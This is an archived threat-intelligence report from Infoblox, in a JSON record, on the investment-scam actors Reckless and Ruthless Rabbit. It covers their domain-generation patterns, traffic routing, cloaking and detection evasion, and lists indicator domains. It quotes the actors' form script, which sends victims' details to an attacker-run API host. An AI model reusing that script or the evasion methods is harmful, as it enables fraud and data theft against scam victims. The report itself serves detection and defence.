{
	"id": "f263fca7-9f45-4710-9286-a2367712f145",
	"created_at": "2026-04-06T00:13:48.036827Z",
	"updated_at": "2026-04-10T03:35:21.357367Z",
	"deleted_at": null,
	"sha1_hash": "e13581982de826d8fe2725be39118277a7e65c6c",
	"title": "Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams | Infoblox",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7213037,
	"plain_text": "Uncovering Actor TTP Patterns and the Role of DNS in Investment\r\nScams | Infoblox\r\nBy Infoblox Threat Intel\r\nPublished: 2025-04-28 · Archived: 2026-04-05 13:30:42 UTC\r\nAuthors: Darby Wise, Piotr Glaska, Laura da Rocha\r\nAccording to the Federal Trade Commission (FTC), consumers lost more money to investment scams than any other kind in\r\n2024. This equates to a 24 percent increase from 2023 to 2024 in the amount of money lost—a total of US$5.7 billion1.\r\nThese threats take a variety of forms, ranging from the so-called pig butchering scams, which generally start with generic text\r\nmessages, to ones advertised through social media. Sometimes human interaction is involved and sometimes it is not. We\r\ntrack several investment scam actors and we’ve previously published research on two of them, Savvy Seahorse and Horrid\r\nHawk, who have distinctive DNS fingerprints.\r\nThis report expands on our previous publications to consider common techniques, tactics, and procedures (TTPs) of several\r\ninvestment scam actors who lure victims with fake platforms, including crypto exchanges. Fake websites referred to as\r\n“profit platforms” are designed to convince users they are dealing with a legitimate business. We’ve found that the actors\r\noften:\r\nRegister large numbers of domains algorithmically over time, a technique we refer to as registered domain generation\r\nalgorithms (RDGAs)\r\nEmbed similar web forms to collect user data\r\nHide their activity through traffic distribution systems (TDS)\r\nLeverage fake news often featuring spoofed government endorsements, a celebrity, or fake first-hand accounts of the\r\ninvestment program\r\nShare website structure indicative of the use of a kit\r\nWe are often able to discover and track investment scams through DNS fingerprints. 
Two of the actors detailed in this paper,\r\nwho we call Reckless Rabbit and Ruthless Rabbit, for example, are tracked through their use of RDGAs.\r\nEmbedded Web Forms\r\nWhile the actors we investigated may use different means to distribute their campaigns, we found that all of them include, at\r\nsome stage, an embedded web form, which we identified as the first and most notable TTP pattern. For example, Reckless\r\nRabbit creates ads on Facebook that lead to fake news articles featuring a celebrity endorsement for the investment platform.\r\nThe article includes a link to the scam platform which contains an embedded web form persuading the user to enter their\r\npersonal information to “register” for the investment opportunity.\r\nThe form typically requires the user’s first and last name, email address, and phone number, which automatically formats the\r\ncountry code to match the user’s IP geolocation. Some forms also require the user to create a password and offer the option\r\nto auto-generate one for them. Figure 1 below shows an example from a February 2025 scam where we accessed the landing\r\npage using a U.S.-based IP address; Figure 2 shows the auto-generated password. The actor uses this information to progress\r\nto the next step in the scam—information validation checks.\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 1 of 18\n\nFigure 1. Example of embedded web form in a February 2025 investment scam2\r\nFigure 2. Embedded web form with an auto-generated password field3\r\nValidation Checks\r\nOnce the user enters their personal details, most of the campaigns conduct validation checks on the user’s information and\r\ntheir IP address. 
The checks each actor performs can vary, but common ones include:\r\nValidity of the user’s email and/or phone number\r\nDuplication of emails and/or phone numbers\r\nMultiple attempts to register using the same IP address within a specific timeframe\r\nMissing information (name, phone number, etc.)\r\nThe scam actors often perform HTTP GET requests to legitimate IP validation tools, such as ipinfo[.]io, ipgeolocation[.]io,\r\nor ipapi[.]co. They use these validation checks to filter out traffic from specific countries, security researchers, and/or bots.\r\nIn many campaigns, if a user passes the validation, a TDS routes them either directly to the investment scam platform where\r\nthey are encouraged to transfer money, or to a page that thanks them for registering and says a representative will contact\r\nthem with additional information. Some campaigns use call centers to provide the victims with instructions on how to set up\r\nan account and transfer money into the fake investment platform. For users who do not pass the validation step, many\r\ncampaigns will simply display a “thank you” landing page, as shown in Figure 3.\r\nFigure 3. Ruthless Rabbit’s “thank you” page4\r\nTraffic Distribution Systems\r\nSome of the scam actors we’ve researched leverage their own TDSs to collect information about the victim and\r\nconditionally make decisions on which web content the user will be redirected to. This is the case for an active crypto scam\r\nactor we have been tracking that utilizes a TDS to route users from different countries to different fake investment platforms.\r\nTable 1 below shows this actor’s TDS redirections based on the geolocation of the user accessing the crypto scam page\r\nbitcoin-profit[.]org. 
This threat actor routes users from the United States to the legitimate platform eToro, possibly to evade\r\ndetection from security researchers.\r\nIP Geolocation TDS Domain(s) Investment Platform Domain\r\nSwitzerland5 mykryplogin[.]com -\u003e murzasanny[.]com trading[.]nexperts[.]pro\r\nCanada6 powapi[.]net primeassets[.]uk\r\nAustralia7 powapi[.]net –\u003e camersyf[.]com trading[.]xptraders[.]com\r\nUnited States8 cryptoveteran[.]care etoro[.]com (legitimate)\r\nTable 1. TDS and redirection domains for a crypto scam campaign. Users accessing bitcoin-profit[.]org from\r\nSwitzerland and Australia redirect to a secondary TDS domain.\r\nRDGAs and Dynamic Website Logos\r\nIn a previous blog we published in 2023, we introduced the concept of RDGAs:\r\nRegistered domain generation algorithms (RDGAs) are a programmatic mechanism that allows actors to create many\r\ndomain names at once or over time to register for use in their infrastructure. These differ from traditional domain\r\ngeneration algorithms (DGAs) that have long been associated with malware in significant ways. In an RDGA, the algorithm\r\nis a secret kept by the actor, and they register all the domain names. In a traditional DGA, the malware contains an\r\nalgorithm that can be discovered, and most of the domain names will not be registered. While DGAs are used exclusively for\r\nconnection to a malware controller, malicious RDGAs are used for a wide range of malicious activity.9\r\nSince then, we’ve observed over 3 million RDGA domains on the internet. These domains are commonly used in\r\nadvertising, so seeing these investment scams intermingled with other product ads makes sense. In the actor-specific\r\nsections of this paper below, we will show the distinct RDGA patterns that Reckless and Ruthless Rabbits use to create large\r\nsets of domains for their campaigns.\r\nSome actors use dictionary-based RDGAs to generate domain names that match dynamic website names and logos in their\r\nscam pages. 
Each website contains an embedded web form for the user to provide their information. As an example, Figure\r\n4 below shows that the top left corners of the scam websites display the supposed logo of the investment\r\nplatform/application, matching the domain name. The different pages displayed in Figure 4 have the same or very similar\r\ncontent, but the logo varies depending on the domain name. Scammers leverage the RDGAs to create large sets of domains,\r\nwhich they in turn use to automatically update the logo accordingly, to scale their campaigns.\r\nOther patterns we have seen threat actors use in most of the investment scam campaigns include:\r\nDistributing scam domains through malicious Facebook ads\r\nPromising high returns if a user inputs a small amount of money during registration\r\nPredominantly targeting users in Eastern European countries, such as Russia, Romania, Poland, etc.\r\nExcluding traffic from certain countries\r\nInvestment Threat Actors\r\nAs we mentioned at the beginning of the paper, two of the more notable investment scam actors that we are tracking are\r\nReckless and Ruthless Rabbits. They follow many of the common TTPs we’ve described above, but they also have their\r\nown distinguishing characteristics.\r\nReckless Rabbit\r\nReckless Rabbit lures victims into fake investment scams through malicious Facebook advertisements. 
They intersperse\r\nthem among other content, most commonly items for sale on popular marketplace stores such as Amazon (see Figure 5).\r\nThis technique of burying their investment scam ads among other, seemingly innocuous ads may be a trick they use to avoid\r\npolicy enforcement from Facebook.\r\nFigure 5: Reckless Rabbit’s Facebook ads for products on Amazon\r\nThe main scam advertisements take the user to either:\r\npages such as a full fake news story, which includes a link to the investment landing page (Figure 6), or\r\nthe investment platform itself (Figure 7).\r\nFigure 6: Website with fake news about a Polish celebrity and the investment scam lure at the end of the article. These are\r\nboth translated from the original page in Polish. The celebrity’s image and name have been redacted for the purpose of this\r\npaper.\r\nFigure 7: Reckless Rabbit’s investment scam platform in Norwegian and the translation to English. The site contains a web\r\nform similar to other investment scam actors13 and a fake endorsement from a Norwegian billionaire businessman.\r\nReckless Rabbit has been creating domains since as early as April 2024, with new domains created on a near-daily basis.\r\nTable 2 shows examples of the two RDGA patterns they use to create these domains. The first involves random characters, a\r\nthree-letter month abbreviation, an English word, and is in the .info TLD. The second pattern combines two or three English\r\nwords, which may or may not be separated by a dash. 
The domains in this group are in the .com and .info TLDs.\r\nDomain Pattern Examples\r\n\u003c1-2 random characters\u003e\u003c3 letter month\u003e\u003cshort English word\u003e[.]info kcfebdrill[.]info\r\nalmarsilk[.]info\r\niaprwall[.]info\r\nwmaycurr[.]info\r\nfjunmedi[.]info\r\nfjulswap[.]info\r\nfaugswap[.]info\r\nssepcoin[.]info\r\nkoctice[.]info\r\nlnovchalk[.]info\r\nqpdecbid[.]info\r\n\u003c2-3 random English words separated by dashes or not\u003e[.]\u003ccom, info\u003e\r\nwell-groomedcanvas[.]com\r\nupkeep-vocal[.]com\r\nextra-largewrinkles[.]info\r\nport-rusty-time[.]com\r\nlibrary-novel-axe[.]com\r\nacoustic-fund-rate[.]info\r\ntemple-well-known[.]info\r\nroomyspeedboat[.]info\r\nlongmarble[.]info\r\nsixcrowd[.]com\r\nmercifulknife[.]com\r\nTable 2: Reckless Rabbit’s RDGA domain patterns and examples\r\nWhen the victim accesses the fake news website, the actor collects information about the user, such as IP address and\r\ngeolocation, to determine the language that will be displayed on the page. They use the metadata as input to make a call to\r\nan API endpoint they maintain (/api/v1/trigger/field/) to fetch and display the site content appropriately. Figure 8 shows a\r\ncode snippet of one of the scripts called in the HTTP request chain and includes the API call.\r\nFigure 8. Code snippet of scripts that make an API call to get the language and the page to which the user will get\r\nredirected14, 15\r\nWe’ve observed instances where Reckless Rabbit uses validation checks to filter out traffic from specific countries,\r\nincluding Afghanistan, Somalia, Liberia, Madagascar, and others. 
The code snippet in Figure 9 shows the full list of\r\nexcluded countries.\r\nFigure 9: Code snippet that shows a variable for countries to be excluded16, 17\r\nReckless Rabbit configures wildcard DNS responses to their domains, which means that a query to any subdomain (e.g.,\r\nwildcardbdidbanpdla[.]brilliantwallaby[.]info) of their domains will return a response, as shown in Figure 10. Wildcarding\r\ngenerates noise in DNS because it means anyone can make a query to any subdomains for that SLD, and the subdomains\r\nwill return responses. This makes it difficult to determine which subdomains are actively being used by an actor, and which\r\nsubdomains are random queries triggered by, for example, security researchers. In this case, security tools may not add the\r\nSLD to their feeds and instead only add the subdomains that were confirmed to contain malicious content, thereby helping\r\nthe actor to use their domains longer.\r\nFigure 10. Wildcard response behavior to a random subdomain of an existent Reckless Rabbit domain\r\nReckless Rabbit uses several additional techniques to avoid detection, including:\r\nInterspersing ads that redirect to the investment scam between ads for items supposedly being sold on popular\r\nmarketplaces, such as Amazon (Figure 11)\r\nAdding unrelated images to avoid detection based on image recognition (Figure 12)\r\nDisplaying (in the ad) a decoy domain that is different from the domain that the user will be redirected to once they\r\nclick on the link (Figure 13)\r\nUsing a decoy page with non-suspicious content—such as a website for a restaurant—on the SLD, shielding the\r\nactual investment scam page hosted on the full URL (Figure 14)\r\nFigure 11. 
Investment scam lure mixed with items being sold in marketplaces\r\nFigure 12. Technique to prevent detection by image recognition-based security technology\r\nFigure 13. Example of Facebook ad caption with decoy domain, amazon[.]pl. The ad redirects to a URL under tyxarai[.]org\r\nand is associated with wjulbucks[.]info18, 19\r\nFigure 14. Decoy page with non-suspicious content on the SLD20\r\nRuthless Rabbit\r\nRuthless Rabbit has been running investment scam campaigns since at least November 2022. These campaigns follow\r\nsimilar themes to those we have seen from Horrid Hawk and other Russian-hosted scam campaigns that primarily target\r\nusers in Russia, Poland, Romania, and Kazakhstan, among other countries. Most current active campaigns are hosted on two\r\ndedicated IPs, but the actor has previously used at least eight different IPs hosted with Aeza, as well as a dedicated IP hosted\r\nwith IROKO. Combined, these IPs host over 2,600 actor-owned domains. They use Namecheap for domain registration,\r\nname servers and mail servers.\r\nIn May 2024, Ruthless Rabbit began using a single RDGA pattern to create the large number of domains necessary to\r\noperate their scams (see Table 3).\r\nDomain Pattern Examples\r\n\u003crandom English word or 3-7 random characters\u003e\u003cbik, job, mot, lin, tyt, byk, bot, fat, pit, kot, etc.\u003e\r\n[.]pro\r\ntopsmot[.]pro\r\nsitemot[.]pro\r\nviserbik[.]pro\r\ngoaljob[.]pro\r\nsomajob[.]pro\r\nwasakot[.]pro\r\nTable 3. 
Ruthless Rabbit RDGA pattern and examples\r\nCampaign Themes\r\nIn February 2023, Ruthless Rabbit started hosting Baltic Pipe financial scam pages, a common theme used in investment\r\nscams targeting Eastern European users. Over time, they diversified the themes of their landing pages, to include scams\r\nspoofing WhatsApp, Google Finance, and Meta. The most prevalent campaign theme since May 2024 is a news article\r\nspoofing the Russian-language news website “Channel One” that claims users who sign up for the “GazInvest” platform will\r\nearn up to 300,000 Russian rubles. This page (see Figure 15) shares the common TTP patterns we mentioned above,\r\nincluding lures of high returns, an embedded web form, and IP geolocation tools for conducting validation checks.\r\nFigure 15. Landing page for the Russian GazInvest scam21\r\nThe actor hosts their scam landing pages on specific URL paths that change per campaign theme. They use a concealment\r\ntechnique of giving users who attempt to access the SLD alone rather than a URL—a typical move for security researchers\r\n—an HTTP 404 Not Found error. Table 4 shows examples of the URL paths for some of the most prevalent campaigns.\r\nWe’ve broken out the SLDs and the URL paths because the latter are what the actor changes every couple of months.\r\nCampaign Theme SLD URL Path\r\nJanuary 2025 – GazInvest Platform22 brudamot[.]pro /4YJ3LH?MPC_3=16k3ua14tff7k\r\nSeptember 2024 – GazInvest Platform23 dropbik[.]pro /lander/gazinvestgaz_4301/\r\nMarch 2025 – Spoofed Google Finance Page24 easyjob[.]pro /google_finance_79/\r\nDecember 2024 – Fake Russian News Site25 kinabik[.]pro /JF5vNK?MPC_3=2pgkm0e57koso\r\nTable 4. 
Examples of URL paths for different SLDs and campaigns\r\nWhat’s interesting about Ruthless Rabbit is that they operate their own cloaking service to perform validation checks; the\r\ncloaking service domain (mcraftdb[.]tech) hosts publicly available documentation for their API titled “Mcraft MediaCraft\r\nTech API.” The documentation (Figure 16) provides insight into some of the actor’s validation checks on “leads,” or users,\r\nwho enter personal information into the forms embedded in the investment scam pages. The cloaking service looks for users\r\nentering duplicate information or attempting to access the investment platform multiple times within the previous 20\r\nminutes using the same IP address. Users who do not pass the checks will be redirected to either a 404 Not Found error page\r\nor to another page on the SLD titled thanks.html, which states someone will contact them for additional information. Figure\r\n17 shows the form script the actor uses for this API call.\r\nFigure 16. 
API documentation for the actor’s validation API26\n$('form').submit(function (event){\n $(this).submit(false);\n event.preventDefault();\n event.stopPropagation();\n event.stopImmediatePropagation();\n if($('.iti__selected-dial-code').length){\n var prefix = $('.iti__selected-dial-code').html().slice(1)\n $(this).append(` `)\n }\n var host = `\u0026host=${$(location).attr('hostname')}`\n var url=`\u0026url=${$(location).attr('href')}`\n var so=`\u0026so=Google Finance`\n var args = host + url + so\n var search = location.search.substring(1);\n\n$.ajax({\n type: \"POST\",\n url: 'https://mcraftdb[.]tech/api/v1/submit/a6111ace-7304-4d9b-8dfe-9aafb7e9638e/' + \"?\" + search,\n data: $(this).serialize() + args,\n headers: $(this).headers,\n dataType: 'json',\n crossDomain: true,\n success: function (response) {\n if (response.status === true) {\n document.location.replace(response.data);\n } else {\n document.location.href = location.protocol + '//' + location.host + location.pathname.substring(0, location.pathna\n }\n },\n })\n var btn = $(this).find(':submit')\n\nbtn.prop('disabled', true)\n setTimeout(function () {\n btn.prop('disabled', false)\n },30000)\n})\nFigure 17. API call used by Ruthless Rabbit to perform validation checks on the user27\r\nInterestingly, none of the forms in these campaigns have a field to enter an email address, but the response examples in\r\nFigure 16 indicate an email is required. We discovered that embedded into the HTML code is a script with a function\r\ngenerateRandomEmail() (see Figure 18) that generates a new email address in the hidden form field every time the page is\r\nrefreshed. This indicates that the actor may not actually use the phone number and email address to contact the user but\r\ninstead uses them only to perform the validation checks. 
Most of the campaigns do, however, perform checks on the user’s\r\nIP geolocation via ipgeolocation[.]io and ipinfo[.]io, two legitimate geolocation lookup tools.\r\nFigure 18. HTML code showing the generateRandomEmail() function\r\nUsers who pass the validation checks will be routed to some sort of investment platform where they will be prompted to\r\nenter their financial information to complete the registration for the investment program. After numerous tests, however, we\r\nwere unable to successfully reach that final step. Despite passing the validation checks for all personal details, including the\r\nIP geolocation and phone number, we still received a failed response stating, “Cant register lead, no more fallbacks\r\navailable;”. Oddly enough, there was no information on this type of response in the actor’s API documentation.\r\nThe Importance of DNS\r\nThreat actors operating these large-scale and increasingly sophisticated scams exploit DNS to help build and maintain their\r\ninfrastructure. Over the years, actor abuse of DNS mechanisms, such as RDGAs and TDSs, has been underreported in the\r\nsecurity community, despite being crucial to malicious campaigns.\r\nSome investment scam actors capitalize on malicious TDSs to operate their campaigns. A TDS enables threat actors to\r\nstrengthen their infrastructure, making it more resilient by providing the ability to hide malicious content from security\r\nresearchers and bots. For example, one actor we’ve been tracking uses an HTTP-based TDS to shield their malicious scam\r\nlanding pages. We show an instance of a redirection chain in their campaign in Figure 19. Only by tracking these TDSs\r\nthrough DNS are we able to detect and block the infrastructure at scale, before the redirections even occur.\r\nFigure 19. 
Redirection chain for an investment scam actor’s TDS28\r\nActors also take advantage of RDGAs to create large numbers of domains to use in their campaigns, which enables them to\r\nhide in plain sight and change out domains often. As we wrote last summer:\r\n“Scammers use RDGAs for the same reasons that other threat actors use them: their domains are frequently blocked or\r\ntaken down by service providers. Consequently, it’s advantageous for them to have a steady stream of new domains with\r\nwhich to execute their scams.”\r\nConclusion\r\nThere are so many RDGA domains created every day that it is impossible for human researchers to find and assess them all.\r\nThrough the lens of DNS, we are able to leverage automated detection and correlate these investment scam domains at scale.\r\nThreat actors like Reckless and Ruthless Rabbits will be relentless in their attempts to trick as many users as possible.\r\nBecause these types of scams have proven to be highly profitable for them, they will continue to grow rapidly—both in\r\nnumber and sophistication.\r\nIndicators of Activity\r\nIndicator Note\r\nmiddle.sturdypants[.]com\r\nbrilliantwallaby[.]info\r\nencouragingtax[.]info\r\ntyxarai[.]org\r\nIndicators used by Reckless Rabbit in investment scam campaigns\r\nupkeep-vocal[.]com\r\nextra-largewrinkles[.]info\r\nport-rusty-time[.]com\r\nlibrary-novel-axe[.]com\r\nacoustic-fund-rate[.]info\r\ntemple-well-known[.]info\r\nroomyspeedboat[.]info\r\nlongmarble[.]info\r\nsixcrowd[.]com\r\nmercifulknife[.]com\r\nwjulbucks[.]info\r\nkcfebdrill[.]info\r\nalmarsilk[.]info\r\niaprwall[.]info\r\nwmaycurr[.]info\r\nbmaypost[.]info\r\nfjunmedi[.]info\r\nfjulswap[.]info\r\nfaugswap[.]info\r\nssepcoin[.]info\r\nkoctice[.]info\r\nlnovchalk[.]info\r\nqpdecbid[.]info\r\nbortjob[.]pro\r\ntopsmot[.]pro\r\nsitemot[.]pro\r\nviserbik[.]pro\r\ngoaljob[.]pro\r\nsomajob[.]pro\r\nwasakot[.]pro\r\nbrudamot[.]pro\r\ndropbik[.]pro\r\neasyjob[.]pro\r\nkinabik[.]pro\r\nDomains used by Ruthless Rabbit in investment scam campaigns\r\nbitcoineverestai[.]app\r\nbitcoin-eprex[.]com\r\nechelonyieldai[.]app\r\neco-terra[.]app\r\neverix-edge[.]org\r\ngptifexai[.]com\r\nimmediatebitwave[.]app\r\nimmediateluminary[.]com\r\nimmediatemomentum[.]site\r\nquantumflash[.]org\r\nsolidreturn[.]app\r\nSample of domains used by an unnamed actor for investment scams\r\nvensotixapp-platform[.]store\r\nvasezonixapp[.]guru\r\nvensotixapp[.]click\r\nvenzotexapp[.]cloud\r\naportunex[.]app\r\naportunex-app[.]shop\r\naportunex-app[.]trade\r\naportunex-app[.]wiki\r\naportunexapp[.]top\r\naportunexapp[.]bond\r\naportunexapp[.]help\r\naportunexapp[.]trade\r\naportunexapp[.]wiki\r\nbitcoin-apex[.]guru\r\nSample of RDGA and registered DDGA domains used by an unnamed actor for\r\ninvestment scams\r\nbitcoin-apex[.]help\r\nbitcoin-apex[.]website\r\nbitcoinapex-platform[.]click\r\nbitcoinapex-platform[.]guru\r\nbitcoinapex-platform[.]top\r\nbitcoinapex[.]website\r\nFootnotes\r\n1. https://www.ftc.gov/news-events/news/press-releases/2025/03/new-ftc-data-show-big-jump-reported-losses-fraud-125-billion-2024\r\n2. 
https://urlscan.io/result/f217e772-6deb-4cbc-88fd-b6b46363494e\r\n3. https://urlscan.io/result/0195f7b6-1cda-77ce-aadd-22dda511aa0e\r\n4. https://urlscan.io/result/aca53e46-291b-46bd-bc67-76179d82c20a/\r\n5. https://urlscan.io/result/0195d87a-5ee5-7228-b6e3-c1968ffc562b/\r\n6. https://urlscan.io/result/0195ce8b-6b4e-7770-b8d5-cea621d1b835/\r\n7. https://urlscan.io/result/0195ce8e-3549-700b-addc-64a4879a5ef2/\r\n8. https://urlscan.io/result/0195fd9d-9679-736a-8652-99397922991a/\r\n9. https://insights.infoblox.com/resources-research-report/infoblox-research-report-registered-dgas-the-prolific-new-menace-no-one-is-talking-about\r\n10. https://urlscan.io/result/0ba64979-2186-44ed-858e-51f030c9651b/\r\n11. https://urlscan.io/result/4859f1d7-d337-4f5e-bfb0-e3a8d677a77b/\r\n12. https://urlscan.io/result/567a05cb-cae2-4937-a326-2f314c289720/\r\n13. https://urlscan.io/result/924de331-a6ff-45f7-a4cc-cb13ca93f23f/\r\n14. https://urlscan.io/result/3f999960-0b0f-4cfe-96ae-78cebca95290/#transactions\r\n15. https://urlscan.io/responses/23fb5db0618f6a48381978574a34168554a6ecd14f7d21a1d754d27a8ca4eea8/\r\n16. https://urlscan.io/result/924de331-a6ff-45f7-a4cc-cb13ca93f23f/#transactions\r\n17. https://urlscan.io/responses/7402355aa0d7eb0248bf6fdfb572a43e6457e5c1b26719147464ea224e5009a7/\r\n18. https://urlscan.io/result/01956c44-fe9a-7113-a0c8-f025f9d4dc9e\r\n19. https://urlscan.io/result/01956c44-fe9a-7113-a0c8-f025f9d4dc9e#links\r\n20. https://urlscan.io/result/019585ef-23c0-7000-bdaf-babc56433b08\r\n21. https://urlscan.io/result/01958f39-aa3e-7001-ab7d-fbe0e3bab026\r\n22. https://urlscan.io/result/8c5fe52a-e2c3-4300-8a84-320d79e878da/\r\n23. https://urlscan.io/result/5c149a21-977b-4cf7-ae02-7095bf8ac54d/\r\n24. https://urlscan.io/result/fe9b35b4-910d-40a5-8edb-e0babdf75740/\r\n25. https://urlscan.io/result/f90ad3c0-a347-4272-abba-d4e2357c3cb6/\r\n26. https://urlscan.io/result/f1273504-36df-4db5-9a7f-2532594d0d04/\r\n27. 
https://urlscan.io/responses/7b3001eef10d518496867654ec76e4f3c6c33550d7a67780ce0440a4c28b5b50/\r\n28. https://urlscan.io/result/85e9ce2c-92f5-48ba-8dfd-ed47d63a9eca/#redirects\r\nSource: https://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/"
	],
	"report_names": [
		"uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "617fa30e-d51c-425e-b084-6e60fd200993",
			"created_at": "2025-05-29T02:00:03.211485Z",
			"updated_at": "2026-04-10T02:00:03.86555Z",
			"deleted_at": null,
			"main_name": "Reckless Rabbit",
			"aliases": [],
			"source_name": "MISPGALAXY:Reckless Rabbit",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18272df8-d6de-40f5-a587-66e8e5b48618",
			"created_at": "2025-05-29T02:00:03.212805Z",
			"updated_at": "2026-04-10T02:00:03.866583Z",
			"deleted_at": null,
			"main_name": "Ruthless Rabbit",
			"aliases": [],
			"source_name": "MISPGALAXY:Ruthless Rabbit",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "91e5f048-9ff0-4538-a7d3-85fae0e92118",
			"created_at": "2023-01-06T13:46:38.811091Z",
			"updated_at": "2026-04-10T02:00:03.109117Z",
			"deleted_at": null,
			"main_name": "Unnamed Actor",
			"aliases": [],
			"source_name": "MISPGALAXY:Unnamed Actor",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434428,
	"ts_updated_at": 1775792121,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e13581982de826d8fe2725be39118277a7e65c6c.pdf",
		"text": "https://archive.orkl.eu/e13581982de826d8fe2725be39118277a7e65c6c.txt",
		"img": "https://archive.orkl.eu/e13581982de826d8fe2725be39118277a7e65c6c.jpg"
	}
}